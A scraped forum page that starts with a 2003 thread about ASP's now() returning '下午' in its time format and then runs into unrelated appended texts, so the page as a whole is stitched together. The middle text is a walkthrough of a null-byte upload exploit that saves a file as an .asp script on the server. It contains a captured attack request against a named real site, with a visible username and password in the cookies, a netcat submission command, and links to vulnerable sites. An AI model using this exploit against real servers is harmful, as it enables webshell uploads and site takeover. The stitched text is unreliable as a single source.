服务器上系统时间明明是2003-10-15 16:00:00 用asp的now()时,变成了2003-10-15 下午 04:00:00

citymice 2003-10-15 09:40:40
可以看这里
http://brew.ttzf.com/now.asp

要求不用fomatdate函数,而且在控制面板里面设置区域位置也不成功

本人是asp高手,却被这样的一个菜鸟级的问题难倒?
...全文
79 21 打赏 收藏 转发到动态 举报
写回复
用AI写文章
21 条回复
切换为时间正序
请发表友善的回复…
发表回复
pzlk 2003-10-27
  • 打赏
  • 举报
回复
<%
response.write date()
response.write " "
response.write formatdatetime(now(),vbshorttime)
%>
jnyezhi 2003-10-26
  • 打赏
  • 举报
回复
我靠这不3:60了吗?
citymice 2003-10-26
  • 打赏
  • 举报
回复
不行,不能用编程的方法解决
Equn 2003-10-26
  • 打赏
  • 举报
回复
在NT5.0上也有这个问题,我上次见到了...

服务器不在偶这,只好用编程解决了
tuoshi 2003-10-20
  • 打赏
  • 举报
回复
下面的代码可以解决,只是时间显示两位,即hh:mm

formatdatetime(now, 2) & " " & formatdatetime(now, 4)
tuoshi 2003-10-20
  • 打赏
  • 举报
回复
我也遇到这个问题,服务器没法设置,是租用的空间。
用time()函数也不行,还是会显示 时间 + 上午/下午
怎么办啊?
aabiao 2003-10-20
  • 打赏
  • 举报
回复
不懂,仅作参考
由于NOW返回的日期型的,是<%=%>把它转为字符型的,问题就在转换上,问题应该是IIS的版本上
Rex_love_Burger 2003-10-18
  • 打赏
  • 举报
回复
重点怀疑对象,vbscript的解析引擎版本太新的缘故,可能是升级IE6.0 sp1的后果

不是IE6 sp1的问题,因为我用的sp1.now()输出就很正常


sear 2003-10-18
  • 打赏
  • 举报
回复
我也遇见过 系统是2000 哎 怎么也解决不了
citymice 2003-10-18
  • 打赏
  • 举报
回复
超级大难题
showflow 2003-10-17
  • 打赏
  • 举报
回复
修改注冊表可以達到上述效果,不過實際應用中意義可能不大。
 將
 我的電腦\hkey_users\.default\control panel\international\s1159和
 我的電腦\hkey_users\.default\control panel\international\s2359鍵的值刪除

 然後在控制面板裡設置日期顯示格式,以便修改注冊表可以生效
  • 打赏
  • 举报
回复
有意思,顶
liuruhong 2003-10-17
  • 打赏
  • 举报
回复
我安装VS.Net 2003版本的,也就是说安装了.net framework 1.1,IE6 sp1,似乎没有出现如此的问题,另外我是选择了自动update的。输出格式是2003-10-17 10:13:21

我觉得出问题的地方还是在于操作系统本身,因为是正确的,也没有办法帮你测试
weacone 2003-10-17
  • 打赏
  • 举报
回复
是不是在数据库里设定日期字段的格式?
zykj_2000 2003-10-17
  • 打赏
  • 举报
回复
控制面板-》区域选项
时间 日期选项卡里修改一下
yaozhg 2003-10-17
  • 打赏
  • 举报
回复
谢谢楼上的.

我重装过sp4,根据我看来应该无关.我现在检查了一下我的机子和服务器之间更新的差别.大家请看:

本机完全更新,能打的都打.顺手嘛.

服务器上没打的补丁(now()参数正常的)
Windows Media Player 9.0
windows 日记查看器 (win2000)
NET frameword 版本1.1 简体中文版
最特别的一个:
IE 6 sp1累积补丁

还有几个更新补丁,不过好象是这几天才出来的,但这个问题在之前已经有了.

问题出在NET frameword和IE6 sp1累积补丁上....

有谁的机子现在没问题的,一个一个打上试试看..
citymice 2003-10-16
  • 打赏
  • 举报
回复
大家可以看,这个
http://brew.ttzf.com/now.asp

超级奇怪,这个代码爆简单<%=now()%>

在不同的系统下居然会显示不同的输出结果

可疑点:
1.我的服务器 vbscript 引擎版本是:VBScript/5.6.7426
2.是不是IIS什么地方可以设置输出样式

备注:
1.关于控制面板里面设置时间格式的,N个人尝试过N次没有人成功过,大家就不要花心思在这个地方浪费时间了
2.关于用编程方法实现绝对是一个愚蠢的办法
3.终归应该可以实现时间格式正确显示

总结:
重点怀疑对象,vbscript的解析引擎版本太新的缘故,可能是升级IE6.0 sp1的后果
猜想安装framework1.1估计升级更新的IIS版本估计可以解决这个问题(但是非常冤枉,因为碰到问题的同志还想都还在使用asp开发,升级到.net太浪费了)

555!!!!!!!!!!!!!!~~~~~~~~~~~~~~~还有谁能解决这个问题吗?看上去很简单,但是却非常棘手!
yaozhg 2003-10-15
  • 打赏
  • 举报
回复
真是同命或同病相怜...

就算用fomatdate也不行,所有参数我都试用过了.

问题不在asp上,在操作系统上面....


你看看我问过了.特麻烦.
http://expert.csdn.net/Expert/topic/2346/2346496.xml?temp=.9289972
wolf004 2003-10-15
  • 打赏
  • 举报
回复
没用啊!只不过用date函数和time函数啊!
citymice 2003-10-15
  • 打赏
  • 举报
回复
不用编程
加载更多回复(1)
上传漏洞终结篇 一、写在前面 ***这个上传漏洞利用的原理只是针对form格式上传的asp和php脚本*** NC(Netcat)   用于提交数据包   DOS界面下运行:   NC -vv www.***.com 80<1.txt   -vv: 回显   80: www端口   1.txt: 就是你要发送的数据包  (更多使用方法请查看本区的帖子) WSE(WSockExpert)   对本机端口的监视,抓取IE提交的数据包  (不会用的就自己到网上搜资料N多) 二、漏洞原理 下面例子假设的前提 www主机: www.***.com; bbs路径 : /bbs/ 漏洞源于对动网上传文件的研究,建议有一定编程经验的 看看Dvbbs的upfile.asp文件,没有必要全部看懂 upfile是通过生成一个form表上传,如下
用到的变量: filepath 默认值uploadface 属性hiden act   默认值upload   属性hiden file1  就是你要传的那个文件 关键是 filepath 这个变量! 默认情况下我们的文件上传到www.***.com/bbs/uploadface/ 文件是用你的上传命名的,就是upfile里的这一句 FileName=FormPath&year(now)&month(now)&day(now)&hour(now)&minute(now)&second(now)&ranNum&"."&FileExt ------------------------------------------------------------------------- 我们知道计算机里面的数据是一"\0"为标致的用过C语言的都知道 char data[]="bbs" 这个data数组长度是4: b b s \0 如果我们构造filepath如下,会怎么样呢? filepath="/newmm.asp\0" 我们在2004.09.24.08.24传的文件就会发生变化 没有改: http://www.***.com/bbs/uploadface/200409240824.jpg 用我们构造的filepath: http://www.***.com/newmm.asp\0/200409240824.jpg 这样当服务器接收filepath数据,检测到newmm.asp后面的\0 就理解为filepath的数据就结束了 这样我们上传的文件,比如c:\1.asp 就保存成: http://www.***.com/newmm.asp 三、后期补充 漏洞公布以后很多网站做了相应的处理,但是对于filepath的过滤和处理都不行 有很多网站只是加了N个hiden属性的变量对付网上公布的upfile.exe就是那个 上传漏洞利用工具或者filepath变量利用工具(老兵的)...但是最基本的没改啊。。 而且很对网站的插件里有类似的漏洞,我要说的不要依赖哪些专门的工具 自己改WSE抓到的包里的filepath变量,然后在用NC提交。。。 就算他加N个hiden变量也于事无补。 当然,如果对filepath做了很严格的过滤的话我们的这些理论就将宣告终结 就是我们的新理论诞生的候! 四、漏洞列表 http://dvd.3800cc.com/dispbbs.asp?BoardID=20&ID=5369http://dvd.3800cc.com/dispbbs.asp?BoardID=20&ID=5530http://dvd.3800cc.com/dispbbs.asp?BoardID=20&ID=5531http://dvd.3800cc.com/dispbbs.asp?BoardID=20&ID=5693http://dvd.3800cc.com/dispbbs.asp?BoardID=20&ID=5731http://dvd.3800cc.com/dispbbs.asp?BoardID=20&ID=5746 监听外部主机     NC [-options] hostname port[s] [ports] ... 监听本地主机     NC -l -p port [options] [hostname] [port] options:     -d       detach from console, stealth mode     -e prog     inbound program to exec [dangerous!!]     -g gateway   source-routing hop point[s], up to 8     -G num     source-routing pointer: 4, 8, 12, ...     -h       this cruft     -i secs     delay interval for lines sent, ports scanned     -l       listen mode, for inbound connects     -L       listen harder, re-listen on socket close     -n       numeric-only IP addresses, no DNS     -o file     hex dump of traffic     -p port     local port number     -r       randomize local and remote ports     -s addr     local source address     -t       answer TELNET negotiation     -u       UDP mode     -v       verbose [use twice to be more verbose]     -w secs     timeout for connects and final net reads     -z       zero-I/O mode [used for scanning] port numbers can be individual or ranges: m-n [inclusive] 详细实例: --------------------------------------------------------------------------------- 一、WSE抓包结果(存到1.txt里): POST /bbs/upPhoto/upfile.asp HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Referer: http://www.xin126.com/bbs/upPhoto/upload.asp Accept-Language: zh-cn Content-Type: multipart/form-data; boundary=---------------------------7d423a138d0278 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322) Host: www.xin126.com Content-Length: 1969 Connection: Keep-Alive Cache-Control: no-cache Cookie: ASPSESSIONIDACCCCDCS=NJHCPHPALBCANKOBECHKJANF; isCome=1; GAMVANCOOKIES=1; regTime=2004%2D9%2D24+3%3A39%3A37; username=szjwwwww; pass=5211314; dl=0; userID=62; ltStyle=0; loginTry=1; userPass=eb03f6c72908fd84 -----------------------------7d423a138d0278 Content-Disposition: form-data; name="filepath" ../medias/myPhoto/ -----------------------------7d423a138d0278 ... ... 上传 -----------------------------7d423a138d0278-- --------------------------------------------------------------------------------- 二、UltraEdit打开1.txt改数据: ...... -----------------------------7d423a138d0278 Content-Disposition: form-data; name="filepath" /newmm.asp█         <===这个黑色代表一个空格是 0x20,改成0x00就可以了 ...... --------------------------------------------------------------------------------- 三、重新计算cookies长度,然后nc提交 Nc -vv www.xin126.com 80 <1.txt UltraEdit是一个16位编辑器网上可以下载得到 我们主要用来写那个结束标致: \0 ====>16位表示:0x00或者00H 其实你改的候就直接再filepath的结尾处加个00就OK了 计算cookies长度===>你把fillepath改了之后、肯定是或+或—cookies的长度变了 ...... Host: www.xin126.com Content-Length: 1969 <======就是这个 Connection: Keep-Alive Cache-Control: no-cache ...... 计算会吧?一个字母、数字就是1 对于上传漏洞提出的解决思路:(仅供参考) 1、一般的上传是把上传路径作为一个变量来处理 ===>我们的对策就是把filepath变成常量。。。 这个方法是目前最有效的(我认为的) 2、加强对于\0的处理,原来我们是读到这里就结束 我们继续读直道下一个变量开始的地方,处理就OK了
ASP.NET常用代码 1. 打开新的窗口并传送参数: 传送参数: response.write("<script>window.open('*.aspx?id="+this.DropDownList1.SelectIndex+"&id1="+...+"')aspx?id="+this.DropDownList1.SelectIndex+"&id1="+...+"')aspx?id=" + e.Item.Cells[0].Text + "');"); } 双击表格连接到另一页 在itemDataBind事件中 if(e.Item.ItemType == ListItemType.Item || e.Item.ItemType == ListItemType.AlternatingItem) { string OrderItemID =e.item.cells[1].Text; ... e.item.Attributes.Add("ondblclick", "location.href='../ShippedGrid.aspx?id=" + OrderItemID + "'"); } 双击表格打开新一页 if(e.Item.ItemType == ListItemType.Item || e.Item.ItemType == ListItemType.AlternatingItem) { string OrderItemID =e.item.cells[1].Text; ... e.item.Attributes.Add("ondblclick", "open('../ShippedGrid.aspx?id=" + OrderItemID + "')"); } ★特别注意:【?id=】 处不能为 【?id =】 6.表格超连接列传递参数 <asp:HyperLinkColumn Target="_blank" headertext="ID号" DataTextField="id" NavigateUrl="aaa.aspx?id='<%# DataBinder.Eval(Container.DataItem, "数据字段1")%>' & name='<%# DataBinder.Eval(Container.DataItem, "数据字段2")%>' /> 7.表格点击改变颜色 if (e.Item.ItemType == ListItemType.Item ||e.Item.ItemType == ListItemType.AlternatingItem) { e.Item.Attributes.Add("onclick","this.style.backgroundColor='#99cc00';this.style.color='buttontext';this.style.cursor='default';"); } 写在DataGrid的_ItemDataBound里 if (e.Item.ItemType == ListItemType.Item ||e.Item.ItemType == ListItemType.AlternatingItem) { e.Item.Attributes.Add("onmouseover","this.style.backgroundColor='#99cc00';this.style.color='buttontext';this.style.cursor='default';"); e.Item.Attributes.Add("onmouseout","this.style.backgroundColor='';this.style.color='';"); } 8.关于日期格式 日期格式设定 DataFormatString="{0:yyyy-MM-dd}" 我觉得应该在itembound事件中 e.items.cell["你的列"].text=DateTime.Parse(e.items.cell["你的列"].text.ToString("yyyy-MM-dd")) 9.获取错误信息并到指定页面 不要使用Response.Redirect,而应该使用Server.Transfer e.g // in global.asax protected void Application_Error(Object sender, EventArgs e) { if (Server.GetLastError() is HttpUnhandledException) Server.Transfer("MyErrorPage.aspx"); //其余的非HttpUnhandledException异常交给ASP.NET自己处理就okay了 :) } Redirect会导致post-back的产生从而丢失了错误信息,所以页面导向应该直接在服务器端执行,这样就可以在错误处理页面得到出错信息并进行相应的处理 10.清空Cookie Cookie.Expires=[DateTime]; Response.Cookies("UserName").Expires = 0 11.自定义异常处理 //自定义异常处理类 using System; using System.Diagnostics; namespace MyAppException { /// /// 从系统异常类ApplicationException继承的应用程序异常处理类。 /// 自动将异常内容记录到Windows NT/2000的应用程序日志 /// public class AppException:System.ApplicationException { public AppException() { if (ApplicationConfiguration.EventLogEnabled) LogEvent("出现一个未知错误。"); } public AppException(string message) { LogEvent(message); } public AppException(string message,Exception innerException) { LogEvent(message); if (innerException != null) { LogEvent(innerException.Message); } } //日志记录类 using System; using System.Configuration; using System.Diagnostics; using System.IO; using System.Text; using System.Threading; namespace MyEventLog { /// /// 事件日志记录类,提供事件日志记录支持 /// /// 定义了4个日志记录方法 (error, warning, info, trace) /// /// public class ApplicationLog { /// /// 将错误信息记录到Win2000/NT事件日志中 /// 需要记录的文本信息 /// public static void WriteError(String message) { WriteLog(TraceLevel.Error, message); } /// /// 将警告信息记录到Win2000/NT事件日志中 /// 需要记录的文本信息 /// public static void WriteWarning(String message) { WriteLog(TraceLevel.Warning, message); } /// /// 将提示信息记录到Win2000/NT事件日志中 /// 需要记录的文本信息 /// public static void WriteInfo(String message) { WriteLog(TraceLevel.Info, message); } /// /// 将跟踪信息记录到Win2000/NT事件日志中 /// 需要记录的文本信息 /// public static void WriteTrace(String message) { WriteLog(TraceLevel.Verbose, message); } /// /// 格式化记录到事件日志的文本信息格式 /// 需要格式化的异常对象 /// 异常信息标题字符串. /// /// 格式后的异常信息字符串,包括异常内容和跟踪堆栈. /// /// public static String FormatException(Exception ex, String catchInfo) { StringBuilder strBuilder = new StringBuilder(); if (catchInfo != String.Empty) { strBuilder.Append(catchInfo).Append("\r\n"); } strBuilder.Append(ex.Message).Append("\r\n").Append(ex.StackTrace); return strBuilder.ToString(); } /// /// 实际事件日志写入方法 /// 要记录信息的级别(error,warning,info,trace). /// 要记录的文本. /// private static void WriteLog(TraceLevel level, String messageText) { try { EventLogEntryType LogEntryType; switch (level) { case TraceLevel.Error: LogEntryType = EventLogEntryType.Error; break; case TraceLevel.Warning: LogEntryType = EventLogEntryType.Warning; break; case TraceLevel.Inf LogEntryType = EventLogEntryType.Information; break; case TraceLevel.Verbose: LogEntryType = EventLogEntryType.SuccessAudit; break; default: LogEntryType = EventLogEntryType.SuccessAudit; break; } EventLog eventLog = new EventLog("Application", ApplicationConfiguration.EventLogMachineName, ApplicationConfiguration.EventLogSourceName ); //写入事件日志 eventLog.WriteEntry(messageText, LogEntryType); } catch {} //忽略任何异常 } } //class ApplicationLog } 12.Panel 横向滚动,纵向自动扩展 <asp:panel style="overflow-x:scroll;overflow-y:auto;">asp:panel> 13.回车转换成Tab <script language="javascript" for="document" event="onkeydown"> if(event.keyCode==13 && event.srcElement.type!='button' && event.srcElement.type!='submit' && event.srcElement.type!='reset' && event.srcElement.type!=''&& event.srcElement.type!='textarea'); event.keyCode=9; aspx.cc/exam/enter2tab.aspx 14.DataGrid超级连接列 DataNavigateUrlField="字段名" DataNavigateUrlFormatString="http://xx/inc/delete.aspx?ID={0}" 15.DataGrid行随鼠标变色 private void DGzf_ItemDataBound(object sender, System.Web.UI.WebControls.DataGridItemEventArgs e) { if (e.Item.ItemType!=ListItemType.Header) { e.Item.Attributes.Add( "onmouseout","this.style.backgroundColor=\""+e.Item.Style["BACKGROUND-COLOR"]+"\""); e.Item.Attributes.Add( "onmouseover","this.style.backgroundColor=\""+ "#EFF3F7"+"\""); } } 16.模板列 <ASP:TEMPLATECOLUMN visible="False" sortexpression="demo" headertext="ID"> <ASP:LABEL text='<%# DataBinder.Eval(Container.DataItem, "ArticleID")%>' runat="server" width="80%" id="lblColumn" /> ASP:TEMPLATECOLUMN> <ASP:TEMPLATECOLUMN headertext="选中"> <ASP:CHECKBOX id="chkExport" runat="server" /> <ASP:CHECKBOX id="chkExportON" runat="server" enabled="true" /> ASP:TEMPLATECOLUMN> 后台代码 protected void CheckAll_CheckedChanged(object sender, System.EventArgs e) { //改变列的选定,实现全选或全不选。 CheckBox chkExport ; if( CheckAll.Checked) { foreach(DataGridItem oDataGridItem in MyDataGrid.Items) { chkExport = (CheckBox)oDataGridItem.FindControl("chkExport"); chkExport.Checked = true; } } else { foreach(DataGridItem oDataGridItem in MyDataGrid.Items) { chkExport = (CheckBox)oDataGridItem.FindControl("chkExport"); chkExport.Checked = false; } } } 17.数字格式化 【<%#Container.DataItem("price")%>的结果是500.0000,怎样格式化为500.00?】 <%#Container.DataItem("price","{0:¥#,##0.00}")%> int i=123456; string s=i.ToString("###,###.00"); 18.日期格式化 【aspx页面内:<%# DataBinder.Eval(Container.DataItem,"Company_Ureg_Date")%> 显示为: 2004-8-11 19:44:28 我只想要:2004-8-11 】 <%# DataBinder.Eval(Container.DataItem,"Company_Ureg_Date","{0:yyyy-M-d}")%> 应该如何改? 【格式化日期】 取出来,一般是object ((DateTime)objectFromDB).ToString("yyyy-MM-dd"); 【日期的验证表达式】 A.以下正确的输入格式: [2004-2-29], [2004-02-29 10:29:39 pm], [2004/12/31] ^((\d{2}(([02468][048])|([13579][26]))[\-\/\s]?((((0?[13578])|(1[02]))[\-\/\s]?((0?[1-9])|([1-2][0-9])|(3[01])))|(((0?[469])|(11))[\-\/\s]?((0?[1-9])|([1-2][0-9])|(30)))|(0?2[\-\/\s]?((0?[1-9])|([1-2][0-9])))))|(\d{2}(([02468][1235679])|([13579][01345789]))[\-\/\s]?((((0?[13578])|(1[02]))[\-\/\s]?((0?[1-9])|([1-2][0-9])|(3[01])))|(((0?[469])|(11))[\-\/\s]?((0?[1-9])|([1-2][0-9])|(30)))|(0?2[\-\/\s]?((0?[1-9])|(1[0-9])|(2[0-8]))))))(\s(((0?[1-9])|(1[0-2]))\:([0-5][0-9])((\s)|(\:([0-5][0-9])\s))([AM|PM|am|pm]{2,2})))?$ B.以下正确的输入格式:[0001-12-31], [9999 09 30], [2002/03/03] ^\d{4}[\-\/\s]?((((0[13578])|(1[02]))[\-\/\s]?(([0-2][0-9])|(3[01])))|(((0[469])|(11))[\-\/\s]?(([0-2][0-9])|(30)))|(02[\-\/\s]?[0-2][0-9]))$ 【大小写转换】 HttpUtility.HtmlEncode(string); HttpUtility.HtmlDecode(string) 19.如何设定全局变量 Global.asax中 Application_Start()事件中 添加Application[属性名] = xxx; 就是你的全局变量 20.怎样作到HyperLinkColumn生成的连接后,点击连接,打开新窗口? HyperLinkColumn有个属性Target,将器值设置成"_blank"即可.(Target="_blank") 【ASPNETMENU】点击菜单项弹出新窗口 在你的menuData.xml文件的菜单项中加入URLTarget="_blank" 如: ...... 最好将你的aspnetmenu升级到1.2版 21.委托讨论 http://community.csdn.net/Expert/topic/2651/2651579.xml?temp=.7183191 http://dev.csdn.net/develop/article/22/22951.shtm 22.读取DataGrid控件TextBox值 foreach(DataGrid dgi in yourDataGrid.Items) { TextBox tb = (TextBox)dgi.FindControl("yourTextBoxId"); tb.Text.... } 23.在DataGrid中有3个模板列包含Textbox分别为 DG_ShuLiang (数量) DG_DanJian(单价) DG_JinE(金额)分别在5.6.7列,要求在录入数量及单价的候自动算出金额即:数量*单价=金额还要求录入限制为数值型.我如何用客户端脚本实现这个功能? 〖思归〗 <asp:TemplateColumn HeaderText="数量"> <asp:TextBox id="ShuLiang" runat='server' Text='<%# DataBinder.Eval(Container.DataItem,"DG_ShuLiang")%>' onkeyup="javascript:DoCal()" /> <asp:RegularExpressionValidator id="revS" runat="server" ControlToValidate="ShuLiang" ErrorMessage="must be integer" ValidationExpression="^\d+$" /> asp:TemplateColumn> <asp:TemplateColumn HeaderText="单价"> <asp:TextBox id="DanJian" runat='server' Text='<%# DataBinder.Eval(Container.DataItem,"DG_DanJian")%>' onkeyup="javascript:DoCal()" /> <asp:RegularExpressionValidator id="revS2" runat="server" ControlToValidate="DanJian" ErrorMessage="must be numeric" ValidationExpression="^\d+(\.\d*)?$" /> asp:TemplateColumn> <asp:TemplateColumn HeaderText="金额"> <asp:TextBox id="JinE" runat='server' Text='<%# DataBinder.Eval(Container.DataItem,"DG_JinE")%>' /> asp:TemplateColumn> <script language="javascript"> function DoCal() { var e = event.srcElement; var row = e.parentNode.parentNode; var txts = row.all.tags("INPUT"); if (!txts.length || txts.length < 3) return; var q = txts[txts.length-3].value; var p = txts[txts.length-2].value; if (isNaN(q) || isNaN(p)) return; q = parseInt(q); p = parseFloat(p); txts[txts.length-1].value = (q * p).toFixed(2); } 时,为什么总是刷新一下,然后就滚动到了最上面,刚才选定的行因屏幕的关系就看不到了 page_load page.smartNavigation=true 25.在Datagrid中修改数据,当点击编辑键,数据出现在文本框中,怎么控制文本框的大小 ? private void DataGrid1_ItemDataBound(obj sender,DataGridItemEventArgs e) { for(int i=0;i"; private static string ScriptEnd = "间格式化:string aa=DateTime.Now.ToString("yyyy年MM月dd日"); 1.1 取当前年月日分秒 currentTime=System.DateTime.Now; 1.2 取当前年 int 年= DateTime.Now.Year; 1.3 取当前月 int 月= DateTime.Now.Month; 1.4 取当前日 int 日= DateTime.Now.Day; 1.5 取当前 int = DateTime.Now.Hour; 1.6 取当前分 int 分= DateTime.Now.Minute; 1.7 取当前秒 int 秒= DateTime.Now.Second; 1.8 取当前毫秒 int 毫秒= DateTime.Now.Millisecond; 28.自定义分页代码: 先定义变量 :public static int pageCount; //总页面数 public static int curPageIndex=1; //当前页面 下一页: if(DataGrid1.CurrentPageIndex < (DataGrid1.PageCount - 1)) { DataGrid1.CurrentPageIndex += 1; curPageIndex+=1; } bind(); // DataGrid1数据绑定函数 上一页: if(DataGrid1.CurrentPageIndex >0) { DataGrid1.CurrentPageIndex += 1; curPageIndex-=1; } bind(); // DataGrid1数据绑定函数 直接页面跳转: int a=int.Parse(JumpPage.Value.Trim());//JumpPage.Value.Trim()为跳转值 if(a00 12345.ToString("C"); //生成 ¥12,345.00 12345.ToString("e"); //生成 1.234500e+004 12345.ToString("f4"); //生成 12345.0000 12345.ToString("x"); //生成 3039 (16进制) 12345.ToString("p"); //生成 1,234,500.00% 32、变量.Substring(参数1,参数2); 截取字串的一部分,参数1为左起始位数,参数2为截取几位。 如:string s1 = str.Substring(0,2); 34.在自己的网站上登陆其他网站:(如果你的页面是通过嵌套方式的话,因为一个页面只能有一个FORM,这可以导向另外一个页面再提交登陆信息) <SCRIPT language="javascript"> <!--  function gook(pws)  {   frm.submit();  } //--> </SCRIPT> <body leftMargin="0" topMargin="0" onload="javascript:gook()" marginwidth="0" marginheight="0"> <form name="frm" action=" http://220.194.55.68:6080/login.php?retid=7259 " method="post"> <tr> <td> <input id="f_user" type="hidden" size="1" name="f_user" runat="server"> <input id="f_domain" type="hidden" size="1" name="f_domain" runat="server"> <input class="box" id="f_pass" type="hidden" size="1" name="pwshow" runat="server"> <INPUT id="lng" type="hidden" maxLength="20" size="1" value="5" name="lng"> <INPUT id="tem" type="hidden" size="1" value="2" name="tem"> </td> </tr> </form> 文本框的名称必须是你要登陆的网页上的名称,如果源码不行可以用vsniffer 看看。   下面是获取用户输入的登陆信息的代码: string name; name=Request.QueryString["EmailName"]; try {  int a=name.IndexOf("@",0,name.Length);  f_user.Value=name.Substring(0,a);  f_domain.Value=name.Substring(a+1,name.Length-(a+1));  f_pass.Value=Request.QueryString["Psw"]; } catch {  Script.Alert("错误的邮箱!");  Server.Transfer("index.aspx"); } 35.警告窗口 /**//// /// 服务器端弹出alert对话框 /// /// 提示信息,例子:"不能为空!" /// Page类 public void Alert(string str_Message,Page page) { page.RegisterStartupScript("","<script>alert('"+str_Message+"'); /// 服务器端弹出alert对话框,并使控件获得焦点 /// /// 获得焦点控件Id值,比如:txt_Name /// 提示信息,例子:"请输入您姓名!" /// Page类 public void Alert(string str_Ctl_Name,string str_Message,Page page) { page.RegisterStartupScript("","<script>alert('"+str_Message+"');document.forms(0)."+str_Ctl_Name+".focus(); document.forms(0)."+str_Ctl_Name+".select(); /// 服务器端弹出confirm对话框 /// /// 提示信息,例子:"您是否确认删除!" /// 隐藏Botton按钮Id值,比如:btn_Flow /// Page类 public void Confirm(string str_Message,string btn,Page page) { page.RegisterStartupScript("","<script> if (confirm('"+str_Message+"')==true){document.forms(0)."+btn+".click();} /// 服务器端弹出confirm对话框,询问用户准备转向那些操作,包括“确定”和“取消”的操作 /// /// 提示信息,比如:"成功增加数据,单击\"确定\"按钮填写流程,单击\"取消\"修改数据" /// "确定"按钮id值 /// "取消"按钮id值 /// Page类 public void Confirm(string str_Message,string btn_Redirect_Flow,string btn_Redirect_Self,Page page) { page.RegisterStartupScript("","<script> if (confirm('"+str_Message+"')==true){document.forms(0)."+btn_Redirect_Flow+".click();}else{document.forms(0)."+btn_Redirect_Self+".click();} /// 使控件获得焦点 /// /// 获得焦点控件Id值,比如:txt_Name /// Page类 public void GetFocus(string str_Ctl_Name,Page page) { page.RegisterStartupScript("","<script>document.forms(0)."+str_Ctl_Name+".focus(); document.forms(0)."+str_Ctl_Name+".select(); ///名称:redirect ///功能:子窗体返回主窗体 ///参数:url ///返回值:空 /// public void redirect(string url,Page page) { if ( Session["IfDefault"]!=(object)"Default") { page.RegisterStartupScript("","<script>window.top.document.location.href='"+url+"'; /// 名称:IsNumberic /// 功能:判断输入的是否是数字 /// 参数:string oText:源文本 /// 返回值: bool true:是 false:否 /// public bool IsNumberic(string oText) { try { int var1=Convert.ToInt32 (oText); return true; } catch { return false; } } 获得字符串实际长度(包括中文字符) //获得字符串oString的实际长度 public int StringLength(string oString) { byte[] strArray=System.Text .Encoding.Default .GetBytes (oString); int res=strArray.Length ; return res; } 42.将回车转换为TAB //当在有keydown事件的控件上敲回车,变为tab public void Tab(System.Web .UI.WebControls .WebControl webcontrol) { webcontrol.Attributes .Add ("onkeydown", "if(event.keyCode==13) event.keyCode=9"); } 43.datagrid分页中如果删除出现超出索引 public void jumppage(System.Web.UI.WebControls.DataGrid dg) { int int_PageLess; //定义页面跳转的页数 //如果当前页是最后一页 if(dg.CurrentPageIndex == dg.PageCount-1) { //如果就只有一页 if(dg.CurrentPageIndex == 0) { //删除后页面停在当前页 dg.CurrentPageIndex = dg.PageCount-1; } else { //如果最后一页只有一条记录 if((dg.Items.Count % dg.PageSize == 1) || dg.PageSize == 1) { //把最后一页最后一条记录删除后,页面应跳转到前一页 int_PageLess = 2; } else //如果最后一页的记录数大于1,那么在最后一页删除记录后仍然停在当前页 { int_PageLess = 1; } dg.CurrentPageIndex = dg.PageCount - int_PageLess; } } } 发表于 2

28,390

社区成员

发帖
与我相关
我的任务
社区描述
ASP即Active Server Pages,是Microsoft公司开发的服务器端脚本环境。
社区管理员
  • ASP
  • 无·法
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧